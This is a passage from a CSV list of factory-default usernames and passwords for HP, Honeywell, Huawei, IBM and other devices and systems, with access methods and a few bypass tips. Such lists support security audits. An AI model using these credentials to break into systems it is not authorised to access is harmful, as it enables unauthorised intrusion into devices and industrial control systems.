MPE/xx,,,MGR,COGNOS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,CONV,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPDESK,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPOFFICE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPONLY,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP187,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP189,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,HPP196,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,INTX3,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,ITF3000,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,NETBASE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,REGO,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,RJE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,ROBELLE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,SECURITY,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,TELESUP,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,VESOFT,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,WORD,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,MGR,XLSERVER,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,COGNOS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,DISC,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SUPPORT,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,OPERATOR,SYSTEM,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,PCUSER,SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,RSBCMON,SYS,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,SPOOLMAN,HPOFFICE,,,\nhewlett-packard,HP 2000/3000 MPE/xx,,,WP,HPOFFICE,,,\nhewlett-packard,LaserJet Net Printers,,Admin,,,,,\nhewlett-packard,LaserJet Net Printers,,Ones with Jetdirect on them,,,,,\nhewlett-packard,LaserJet Net Printers,,Ones with Jetdirect on them,Anonymous,,,,\nhewlett-packard,LaserJet Net Printers,,User,,,,,\nhewlett-packard,LaserJet Net Printers,,User,Anonymous,,,,\nhewlett-packard,Vectra,,,,hewlpack,,,\nhewlett-packard,Vectra,,Admin,,hewlpack,,,\nhewlett-packard,Webmin,,0.84,admin,hp.com,,,\nhewlettpackard,CommandView SDM,,Multi,N/A,AUTORAID,Secure Manager,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HP,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,ADVMAIL,HPOFFICE DATA,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPONLY,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPP187 SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,HPWORD PUB,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,LOTUS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,MANAGER,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,MGR,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,SERVICE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,FIELD,SUPPORT,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,FIELD.SUPPORT,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,MANAGER.SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,MGR.SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,HELLO,OP.OPERATOR,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,HPOFFICE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,MAIL,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,MPE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,REMOTE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MAIL,TELESUP,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,COGNOS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,HPOFFICE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,ITF3000,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SECURITY,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TCH,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MANAGER,TELESUP,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGE,VESOFT,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CAROLIAN,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CCC,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CNAS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,COGNOS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,CONV,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPDESK,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPOFFICE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPONLY,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP187,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP189,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,HPP196,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,INTX3,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,ITF3000,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,NETBASE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,REGO,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,RJE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,ROBELLE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,SECURITY,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,TELESUP,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,VESOFT,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,WORD,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,MGR,XLSERVER,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,COGNOS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,DISC,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SUPPORT,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,OPERATOR,SYSTEM,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,PCUSER,SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,RSBCMON,SYS,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,SPOOLMAN,HPOFFICE,,,\nhewlettpackard,HP 2000/3000 MPE/xx,,Multi,WP,HPOFFICE,,,\nhewlettpackard,HP Jetdirect (All Models),,,,,,Any,\nhewlettpackard,ISEE,,Multi,admin,isee,Admin,,\nhewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,9100,,,User,Type what you want and close telnet session to print it out,\nhewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,FTP,Anonymous,,User,send files to be printed,\nhewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,HTTP,,,Admin,HTTP interface,\nhewlettpackard,LaserJet Net Printers,Ones with Jetdirect on them,Telnet,,,Admin,press enter twice if no response in telnet,\nhewlettpackard,MPE-XL,,,HELLO,FIELD.SUPPORT,,,\nhewlettpackard,MPE-XL,,,HELLO,MANAGER.SYS,,,\nhewlettpackard,MPE-XL,,,HELLO,MGR.SYS,,,\nhewlettpackard,MPE-XL,,,MANAGER,HPOFFICE,,,\nhewlettpackard,MPE-XL,,,MGR,CAROLIAN,,,\nhewlettpackard,MPE-XL,,,MGR,CCC,,,\nhewlettpackard,MPE-XL,,,OPERATOR,COGNOS,,,\nhewlettpackard,Motive Chorus,,HTTP (port 5060),admin,isee,,,\nhewlettpackard,Officejet,all versions,http,admin,,admin,http interface,\nhewlettpackard,Power Manager,3,HTTP,admin,admin,Admin,,\nhewlettpackard,ProcCurve MSC-5100,,,admin,admin,,,\nhewlettpackard,StoreOnce,,,HPSupport,badg3r5,,,\nhewlettpackard,Vectra,,Console,,hewlpack,Admin,,\nhewlettpackard,iLo,,http,Admin,Admin,Admin,,\nhewlettpackard,iLo,,http,oper,oper,,,\nhewlettpackard,sa7200,,Multi,admin,,Admin,,\nhewlettpackard,sa7200,,Multi,admin,admin,Admin,,\nhewlettpackard,webmin,0.84,HTTP,admin,hp.com,Admin,,\nhoneywell,Experion,,,LocalComServer,LCS pwd 03,,,\nhoneywell,Experion,,,TPSLocalServer,TLS pwd 03,,,\nhorizon datasys,FoolProof,,,,foolproof,,,\nhorizondatasys,FoolProof,,,,foolproof,Admin,,\nhosting controller,Hosting Controller,,,AdvWebadmin,advcomm500349,,,\nhp,MSA2000 G3,,,admin,!admin,,,\nhp,sa7200,,,admin,,,,\nhp,sa7200,,Admin,admin,,,,\nhp,sa7200,,Admin,admin,admin,,,\nhuawei,B200,Globe Broadband Firmware,,,,,,\nhuawei,B932,,http:192.168.1.1,,,,,\nhuawei,B933,Globe BroadBand Firmware,,,,,,\nhuawei,B933,Smart Bro Firmware,,,,,,\nhuawei,B970,etc,192.168.1.1,,admin,admin,,\nhuawei,D100,Huawei Firmware,,,,,,\nhuawei,D100T,Huawei Firmware,,,,,,\nhuawei,E153,11.609.18.21.135,192.168.1.1,admin,admin,admin,,\nhuawei,E226,,,admin,admin,,,\nhuawei,E583C,,192.168.1.1,,admin,Admin,,\nhuawei,E585,,192.168.1.1,Admin,Admin,Admin,Case sensitive,\nhuawei,E585u-82,,192.168.1.1 or http://pocket.wifi,Admin,Admin,Admin,Case sensitive,\nhuawei,E960,,,admin,admin,Admin,,\nhuawei,E960,Etisalat Firmware,,,,,,\nhuawei,E960,STC Firmware,192.168.1.1,admin,admin,,,\nhuawei,EchoLife BM621,Huawei Firmware,,admin,2008x2BJAOTOtJK1,,,\nhuawei,EchoLife HG510a,VNPT Firmware,,admin,admin,,,\nhuawei,EchoLife HG520b,Huawei Firmware,,admin,admin,,,\nhuawei,EchoLife HG520b,TE Data Firmware,,admin,admin,,,\nhuawei,EchoLife HG520b,TT Firmware,,admin,admin,,,\nhuawei,EchoLife HG520c,Vodafone Firmware,,,,,,\nhuawei,EchoLife HG520i,To2Proxy Firmware,,admin,admin,,,\nhuawei,EchoLife HG520s,STC Firmware,,admin,admin,,,\nhuawei,EchoLife HG520s,Saudi Telecom Firmware,,Afaq_shamel,stccpe_2007,,,\nhuawei,EchoLife HG520s,TT Firmware,,admin,admin,,,\nhuawei,EchoLife HG520v,Huawei Turkish Firmware,,admin,admin,,,\nhuawei,EchoLife HG521,Huawei Firmware,,admin,,2012-01-08,,\nhuawei,EchoLife HG532,Huawei Firmware,,admin,,2012-01-08,,\nhuawei,EchoLife HG532b,STC Firmware,,admin,admin,,,\nhuawei,EchoLife HG851,Huawei Firmware,,admin,password,,,\nhuawei,Echolife HG510,Huawei Firmware,,admin,admin,,,\nhuawei,Echolife HG510,Romania Tel Firmware,,admin,admin,,,\nhuawei,Echolife HG510,Serbian Telekom Firmware,,admin,admin,,,\nhuawei,Echolife HG553,Vodafone Italian Firmware,,,,,,\nhuawei,GlobeSurfer II,Virgin Broadband Firmware,,virgin,password,,,\nhuawei,HBI-200,rev A,//192.168.1.1,,,user,,\nhuawei,HG556a,Vodafone Spanish Firmware,,vodafone,vodafone,,,\nhuawei,K3765,,,admin,admin,,,\nhuawei,MT820,,HTTP,admin,admin,,,\nhuawei,MT880,,HTTP,admin,admin,,,\nhuawei,MT880r,,,TMAR#HWMT8007079,,,,\nhuawei,MT880r,,Multi,TMAR#HWMT8007079,,,,\nhuawei,MT880r,,Multi,TMAR#HWMT8007079,,Admin,,\nhuawei,Multiple,,,admin,admin,,,\nhuawei,Quidway WA1003A,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT800,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT820,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT841,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT880,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT880,Triple-T Firmware,,admin,admin,,,\nhuawei,SmartAX MT880,Version E.37,,admin,admin,,,\nhuawei,SmartAX MT882,,,admin,admin,,,\nhuawei,SmartAX MT882,Arnet Spanish Firmware,,admin,admin,,,\nhuawei,SmartAX MT882,CanTV Firmware,,admin,admin,,,\nhuawei,SmartAX MT882,JazzTel Firmware,,admin,admin,,,\nhuawei,SmartAX MT882,Opal Firmware,,admin,admin,,,\nhuawei,SmartAX MT882,RomaniaTel Firmware,,admin,admin,,,\nhuawei,SmartAX MT882,SrpskeTel Firmware,,admin,admin,,,\nhuawei,SmartAX MT882a,FAWRI Firmware,,admin,admin,,,\nhuawei,SmartAX MT882a,Huawei Firmware,,admin,admin,,,\nhuawei,SmartAX MT882a,Viettel Firmware,,admin,admin,,,\nhuawei,e226,,,admin,admin,,,\nhuwai,Modem,,,Admin,admin,,,\nhuwai,Modem,,Multi,Admin,admin,,,\nhyoco,Impress Pro digital sign board,,192.168.0.205 port 9997,no default,no default,,Access thru Hyoco app - get via ftp://hyocodistribution.com:9000,\nhyperic,Hyperic HQ Portal,,,hqadmin,hqadmin,,,\niblitzz,BWA711/All Models,All,HTTP,admin,admin,Admin,This Information Works On All Models Of The Blitzz Line,\nibm,2210,,,def,trade,,RIP,\nibm,3534 F08 Fibre Switch,,,admin,password,,,\nibm,3534 F08 Fibre Switch,,Admin,admin,password,,,\nibm,3534 F08 Fibre Switch,,Multi,admin,password,Admin,,\nibm,3583 Tape Library,,HTTP,admin,secure,Admin,,\nibm,390e,,,,admin,,,\nibm,390e,,Admin,,admin,,,\nibm,390e,,Multi,,admin,Admin,,\nibm,600x,,,,admin,,,\nibm,600x,,Admin,,admin,,,\nibm,600x,,Multi,,admin,Admin,,\nibm,8224 HUB,,,vt100,public,,,\nibm,8224 HUB,,Admin,vt100,public,,,\nibm,8224 HUB,,Multi,vt100,public,Admin,Swap MAC address chip from other 8224,\nibm,8225,,,I5rDv2b2JjA8Mm,A52896nG93096a,,,\nibm,8225,,Admin,I5rDv2b2JjA8Mm,A52896nG93096a,,,\nibm,8225,,Multi,I5rDv2b2JjA8Mm,A52896nG93096a,Admin,,\nibm,8237,,,I5rDv2b2JjA8Mm,A52896nG93096a,,,\nibm,8237,,Admin,I5rDv2b2JjA8Mm,A52896nG93096a,,,\nibm,8237,,Multi,I5rDv2b2JjA8Mm,A52896nG93096a,Admin,,\nibm,8239 Token Ring HUB,,2.5,,R1QTPS,,,\nibm,8239 Token Ring HUB,,Utility Program,,R1QTPS,,,\nibm,8239 Token Ring HUB,2.5,Console,,R1QTPS,Utility Program,,\nibm,A21m,,,,,,,\nibm,A21m,,Admin,,,,,\nibm,A21m,,Multi,,,Admin,,\nibm,AIX,,,guest,guest,,,\nibm,AIX,,4.X,admin,admin,,,\nibm,AIX,,Multi,guest,,User,,\nibm,AIX,,Multi,guest,guest,User,,\nibm,AIX,,User,admin,admin,,,\nibm,AIX,,User,guest,,,,\nibm,AIX,,User,guest,guest,,,\nibm,AIX,4.X,Multi,admin,admin,User,,\nibm,AS/400,,,QSECOFR,QSECOFR,,Any,\nibm,AS/400,,,QSRV,QSRV,,,\nibm,AS/400,,,QSRVBAS,QSRVBAS,,,\nibm,AS/400,,,QUSER,QUSER,,OS/400,\nibm,AS/400,,,qpgmr,qpgmr,,,\nibm,AS/400,,,qsysopr,qsysopr,,,\nibm,Aptiva,,,,,CMOS,Press both mouse buttons repeatedly during boot to bypass CMOS password,\nibm,Ascend OEM Routers,,,,ascend,,,\nibm,Ascend OEM Routers,,Admin,,ascend,,,\nibm,Ascend OEM Routers,,Telnet,,ascend,Admin,,\nibm,BladeCenter Mgmt Console,,HTTP,USERID,PASSW0RD,Admin,,\nibm,Bladecenter Advanced Management Module,,,USERID,PASSW0RD,,,\nibm,CICS,,,$SRV,$SRV,,,\nibm,CICS,,,CICSUSER,CISSUS,,,\nibm,CICS,,,DBDCCICS,DBDCCIC,,,\nibm,CICS,,,FORSE,FORSE,,,\nibm,CICS,,,OPER,OPER,,,\nibm,CICS,,,POST,BASE,,,\nibm,CICS,,,PRODCICS,PRODCICS,,,\nibm,CICS,,,PROG,PROG,,,\nibm,CICS,,,SYSA,SYSA,,,\nibm,CICS,,,VCSRV,VCSRV,,,\nibm,DB2,,,db2admin,db2admin,,WinNT,\nibm,DB2,,,db2fenc1,db2fenc1,,,\nibm,DB2,,,db2inst1,db2inst1,,,\nibm,Directory - Web Administration Tool,5.1,HTTP,superadmin,secret,Admin,Documented in Web Administration Guide,\nibm,Domino Go,,,webadmin,webibm,,,\nibm,Fibre Switch,,3534 F08,admin,password,,,\nibm,HMC,,,hscroot,abc123,,,\nibm,HMC,,,root,passw0rd,,,\nibm,Hardware Management Console,3,ssh,hscroot,abc123,Admin,,\nibm,IBM,,Multi,,,Admin,,\nibm,Infoprint 6700,,Multi,root,,Admin,Also works for older 4400 printers and probably Printronics equivalents as well.,\nibm,Information Archive Appliance,,,iscadmin,iscadmin,Information Archive Admin interface,,\nibm,Information Archive Appliance,,Cluster node servers,root,i8root,Root access,,\nibm,Information Archive Appliance,,IBM Remote Support Manager for Storage server,admin,rsm33inst,Admin Access,,\nibm,Information Archive Appliance,,IBM Remote Support Manager for Storage server,lservice,rsm33inst,Service Access,,\nibm,Information Archive Appliance,,IBM Remote Support Manager for Storage server,root,rsm33inst,Root Access,,\nibm,Information Archive Appliance,,KVM Console,,,Access to the KVM Console,No password by default; if you find it password protected we can't help,\nibm,Information Archive Appliance,,Management console server,root,i8root,Root access,,\nibm,Information Archive Appliance,,Management console server; cluster node servers; RSM for Storage server;,iaadmin,iaadmin,Install upgrades and the IBM Systems Director interface,,\nibm,Integrated Management Module (IMM),,,USERID,PASSW0RD,,,\nibm,LAN Server / OS/2,,,username,password,,2.1 3.0 4.,\nibm,Lotus Domino Go WebServer (net.commerce edition),,,webadmin,webibm,,ANY ?,\nibm,NetCommerce PRO,,,ncadmin,ncadmin,,3.2,\nibm,OS/400,,,11111111,11111111,,,\nibm,OS/400,,,22222222,22222222,,,\nibm,OS/400,,,QSECOFR,QSECOFR,,OS/400,\nibm,OS/400,,,ibm,2222,,,\nibm,OS/400,,,ibm,password,,,\nibm,OS/400,,,ibm,service,,,\nibm,OS/400,,,qpgmr,qpgmr,,,\nibm,OS/400,,,qsecofr,11111111,,,\nibm,OS/400,,,qsecofr,22222222,,,\nibm,OS/400,,,qsecofr,qsecofr,,,\nibm,OS/400,,,qserv,qserv,,,\nibm,OS/400,,,qsrv,qsrv,,,\nibm,OS/400,,,qsrvbas,qsrvbas,,,\nibm,OS/400,,,qsvr,ibmcel,,,\nibm,OS/400,,,qsvr,qsvr,,,\nibm,OS/400,,,qsysopr,qsysopr,,,\nibm,OS/400,,,quser,quser,,,\nibm,OS/400,,,secofr,secofr,,,\nibm,OS/400,,,sedacm,secacm,,,\nibm,OS/400,,,sysopr,sysopr,,,\nibm,OS/400,,,user,USERP,,,\nibm,OS/400,,Multi,11111111,11111111,,,\nibm,OS/400,,Multi,22222222,22222222,,,\nibm,OS/400,,Multi,ibm,2222,,,\nibm,OS/400,,Multi,ibm,password,,,\nibm,OS/400,,Multi,ibm,service,,,\nibm,OS/400,,Multi,qpgmr,qpgmr,,,\nibm,OS/400,,Multi,qsecofr,11111111,,,\nibm,OS/400,,Multi,qsecofr,22222222,,,\nibm,OS/400,,Multi,qsecofr,qsecofr,,,\nibm,OS/400,,Multi,qserv,qserv,,,\nibm,OS/400,,Multi,qsrv,11111111,,,\nibm,OS/400,,Multi,qsrv,22222222,,,\nibm,OS/400,,Multi,qsrv,qsrv,,,\nibm,OS/400,,Multi,qsrvbas,qsrvbas,,,\nibm,OS/400,,Multi,qsvr,ibmcel,,,\nibm,OS/400,,Multi,qsvr,qsvr,,,\nibm,OS/400,,Multi,qsysopr,qsysopr,,,\nibm,OS/400,,Multi,quser,quser,,,\nibm,OS/400,,Multi,secofr,secofr,,,\nibm,OS/400,,Multi,sedacm,sedacm,,,\nibm,OS/400,,Multi,sysopr,sysopr,,,\nibm,OS/400,,Multi,userp,,No,,\nibm,PC BIOS,,,,IBM,,,\nibm,PC BIOS,,,,sertafu,,,\nibm,PC BIOS,,Admin,,IBM,,,\nibm,PC BIOS,,Admin,,MBIU0,,,\nibm,PC BIOS,,Admin,,sertafu,,,\nibm,PC BIOS,,Console,,IBM,Admin,,\nibm,PC BIOS,,Console,,MBIU0,Admin,,\nibm,PC BIOS,,Console,,merlin,No,,\nibm,PC BIOS,,Console,,sertafu,Admin,,\nibm,POS CMOS,,,ESSEX,,,,\nibm,POS CMOS,,,IPC,,,,\nibm,POS CMOS,,Console,ESSEX,,,,\nibm,POS CMOS,,Console,IPC,,,,\nibm,RACF,,,IBMUSER,SYS1,,,\nibm,RS/6000,,,root,ibm,,AIX,\nibm,RSA,,9091,wpsadmin,wpsadmin,,,\nibm,RSA,5,HTTP,wpsadmin,wpsadmin,9091,,\nibm,RSA,5.0,HTTP,wpsadmin,wpsadmin,9091,,\nibm,Remote Supervisor Adapter (RSA),,HTTP,USERID,PASSW0RD,Admin,,\nibm,SONAS,,,USERID,PASSWORD,,,\nibm,Sterling Managed File Transfer,,,fg_sysadmin,password,,,\nibm,T20,,Multi,,admin,Admin,,\nibm,T42,,HTTP,Administrator,admin,Admin,,\nibm,TS3100(3573-L2U),,http,admin,secure,,,\nibm,TS3100,,,admin,secure,,,\nibm,Tivoli,,,admin,admin,,,\nibm,Tivoli,,HTTP,admin,admin,Admin,,\nibm,TotalStorage Enterprise Server,,,storwatch,specialist,,,\nibm,TotalStorage Enterprise Server,,Admin,storwatch,specialist,,,\nibm,TotalStorage Enterprise Server,,Multi,storwatch,specialist,Admin,,\nibm,TotalStorage,,,storwatch,specialist,,,\nibm,VM/CMS,,,$ALOC$,,,,\nibm,VM/CMS,,,ADMIN,,,,\nibm,VM/CMS,,,AP2SVP,,,,\nibm,VM/CMS,,,APL2PP,,,,\nibm,VM/CMS,,,AUTOLOG1,,,,\nibm,VM/CMS,,,BATCH,,,,\nibm,VM/CMS,,,BATCH1,,,,\nibm,VM/CMS,,,BATCH2,,,,\nibm,VM/CMS,,,CCC,,,,\nibm,VM/CMS,,,CMSBATCH,,,,\nibm,VM/CMS,,,CMSUSER,,,,\nibm,VM/CMS,,,CPNUC,,,,\nibm,VM/CMS,,,CPRM,,,,\nibm,VM/CMS,,,CSPUSER,,,,\nibm,VM/CMS,,,CVIEW,,,,\nibm,VM/CMS,,,DATAMOVE,,,,\nibm,VM/CMS,,,DEMO1,,,,\nibm,VM/CMS,,,DEMO2,,,,\nibm,VM/CMS,,,DEMO3,,,,\nibm,VM/CMS,,,DEMO4,,,,\nibm,VM/CMS,,,DIRECT,,,,\nibm,VM/CMS,,,DIRMAINT,,,,\nibm,VM/CMS,,,DISKCNT,,,,\nibm,VM/CMS,,,EREP,,,,\nibm,VM/CMS,,,FSFADMIN,,,,\nibm,VM/CMS,,,FSFTASK1,,,,\nibm,VM/CMS,,,FSFTASK2,,,,\nibm,VM/CMS,,,GCS,,,,\nibm,VM/CMS,,,IDMS,,,,\nibm,VM/CMS,,,IDMSSE,,,,\nibm,VM/CMS,,,IIPS,,,,\nibm,VM/CMS,,,IPFSERV,,,,\nibm,VM/CMS,,,ISPVM,,,,\nibm,VM/CMS,,,IVPM1,,,,\nibm,VM/CMS,,,IVPM2,,,,\nibm,VM/CMS,,,MAINT,,,,\nibm,VM/CMS,,,MOESERV,,,,\nibm,VM/CMS,,,NEVIEW,,,,\nibm,VM/CMS,,,OLTSEP,,,,\nibm,VM/CMS,,,OP1,,,,\nibm,VM/CMS,,,OPERATIONS,OPERATIONS,,,\nibm,VM/CMS,,,OPERATNS,,,,\nibm,VM/CMS,,,OPERATOR,,,,\nibm,VM/CMS,,,PDMREMI,,,,\nibm,VM/CMS,,,PENG,,,,\nibm,VM/CMS,,,PROCAL,,,,\nibm,VM/CMS,,,PRODBM,,,,\nibm,VM/CMS,,,PROMAIL,,,,\nibm,VM/CMS,,,PSFMAINT,,,,\nibm,VM/CMS,,,PVM,,,,\nibm,VM/CMS,,,RDM470,,,,\nibm,VM/CMS,,,ROUTER,,,,\nibm,VM/CMS,,,RSCS,,,,\nibm,VM/CMS,,,RSCSV2,,,,\nibm,VM/CMS,,,SAVSYS,,,,\nibm,VM/CMS,,,SFCMI,,,,\nibm,VM/CMS,,,SFCNTRL,,,,\nibm,VM/CMS,,,SMART,,,,\nibm,VM/CMS,,,SQLDBA,,,,\nibm,VM/CMS,,,SQLUSER,,,,\nibm,VM/CMS,,,SYSADMIN,,,,\nibm,VM/CMS,,,SYSCKP,,,,\nibm,VM/CMS,,,SYSDUMP1,,,,\nibm,VM/CMS,,,SYSERR,,,,\nibm,VM/CMS,,,SYSWRM,,,,\nibm,VM/CMS,,,TDISK,,,,\nibm,VM/CMS,,,TEMP,,,,\nibm,VM/CMS,,,TSAFVM,,,,\nibm,VM/CMS,,,VASTEST,,,,\nibm,VM/CMS,,,VM3812,,,,\nibm,VM/CMS,,,VMARCH,,,,\nibm,VM/CMS,,,VMASMON,,,,\nibm,VM/CMS,,,VMASSYS,,,,\nibm,VM/CMS,,,VMBACKUP,,,,\nibm,VM/CMS,,,VMBSYSAD,,,,\nibm,VM/CMS,,,VMMAP,,,,\nibm,VM/CMS,,,VMTAPE,,,,\nibm,VM/CMS,,,VMTLIBR,,,,\nibm,VM/CMS,,,VMUTIL,,,,\nibm,VM/CMS,,,VSEIPO,,,,\nibm,VM/CMS,,,VSEMAINT,,,,\nibm,VM/CMS,,,VSEMAN,,,,\nibm,VM/CMS,,,VTAM,,,,\nibm,VM/CMS,,,VTAM,VTAM,,,\nibm,VM/CMS,,,VTAMUSER,,,,\nibm,VM/CMS,,Multi,$ALOC$,,,,\nibm,VM/CMS,,Multi,ADMIN,,,,\nibm,VM/CMS,,Multi,AP2SVP,,,,\nibm,VM/CMS,,Multi,APL2PP,,,,\nibm,VM/CMS,,Multi,AUTOLOG1,,,,\nibm,VM/CMS,,Multi,BATCH,,,,\nibm,VM/CMS,,Multi,BATCH1,,,,\nibm,VM/CMS,,Multi,BATCH2,,,,\nibm,VM/CMS,,Multi,CCC,,,,\nibm,VM/CMS,,Multi,CMSBATCH,,,,\nibm,VM/CMS,,Multi,CMSBATCH,CMSBATCH,,,\nibm,VM/CMS,,Multi,CMSUSER,,,,\nibm,VM/CMS,,Multi,CPNUC,,,,\nibm,VM/CMS,,Multi,CPRM,,,,\nibm,VM/CMS,,Multi,CSPUSER,,,,\nibm,VM/CMS,,Multi,CVIEW,,,,\nibm,VM/CMS,,Multi,DATAMOVE,,,,\nibm,VM/CMS,,Multi,DEMO1,,,,\nibm,VM/CMS,,Multi,DEMO2,,,,\nibm,VM/CMS,,Multi,DEMO3,,,,\nibm,VM/CMS,,Multi,DEMO4,,,,\nibm,VM/CMS,,Multi,DIRECT,,,,\nibm,VM/CMS,,Multi,DIRMAINT,,,,\nibm,VM/CMS,,Multi,DISKCNT,,,,\nibm,VM/CMS,,Multi,EREP,,,,\nibm,VM/CMS,,Multi,FSFADMIN,,,,\nibm,VM/CMS,,Multi,FSFTASK1,,,,\nibm,VM/CMS,,Multi,FSFTASK2,,,,\nibm,VM/CMS,,Multi,GCS,,,,\nibm,VM/CMS,,Multi,IDMS,,,,\nibm,VM/CMS,,Multi,IDMSSE,,,,\nibm,VM/CMS,,Multi,IIPS,,,,\nibm,VM/CMS,,Multi,IPFSERV,,,,\nibm,VM/CMS,,Multi,ISPVM,,,,\nibm,VM/CMS,,Multi,IVPM1,,,,\nibm,VM/CMS,,Multi,IVPM2,,,,\nibm,VM/CMS,,Multi,MAINT,,,,\nibm,VM/CMS,,Multi,MAINT,MAINT,,,\nibm,VM/CMS,,Multi,MOESERV,,,,\nibm,VM/CMS,,Multi,NEVIEW,,,,\nibm,VM/CMS,,Multi,OLTSEP,,,,\nibm,VM/CMS,,Multi,OP1,,,,\nibm,VM/CMS,,Multi,OPERATNS,,,,\nibm,VM/CMS,,Multi,OPERATNS,OPERATNS,,,\nibm,VM/CMS,,Multi,OPERATOR,,,,\ni